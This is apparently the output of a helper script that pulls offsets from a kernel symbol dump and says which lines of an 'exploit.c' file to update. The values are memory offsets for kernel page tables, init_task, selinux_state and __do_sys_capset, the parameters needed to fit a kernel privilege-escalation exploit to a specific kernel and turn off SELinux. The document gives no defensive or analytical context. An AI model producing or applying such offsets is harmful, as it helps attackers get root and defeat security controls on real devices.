./helpers/extract_offsets.sh ./helpers/kallsyms-kernel.dump.txt
=== Update exploit.c with these values ===

Line 652: #define IDMAP_PG_DIR_OFFSET 0x284d000
Line 958: #define DEFAULT_KERNEL_SIZE_MB 46

Line 693: swapper_pg_dir_off = idmap_pg_dir_off + 0x5000;
Line 1448: uint64_t idmap_pg_dir_phys = ctx->swapper_pg_dir_phys - 0x5000;
Line 696: uint64_t init_task_off = idmap_pg_dir_off + 0x3e6500;
Line 707: swapper_pg_dir_off = fallback_idmap_pg_dir_off + 0x5000;
Line 708: uint64_t init_task_off = fallback_idmap_pg_dir_off + 0x3e6500;
Line 723: swapper_pg_dir_off = fallback_idmap_pg_dir_off + 0x5000;
Line 724: uint64_t init_task_off = fallback_idmap_pg_dir_off + 0x3e6500;
Line 1455: uint64_t selinux_state_offset = 0x54ccf0;

helpers/analyze.c:
#define PHYS_ADDR 0x14f77c   // __do_sys_capset - _text
#define MAX_SIZE 0x3e8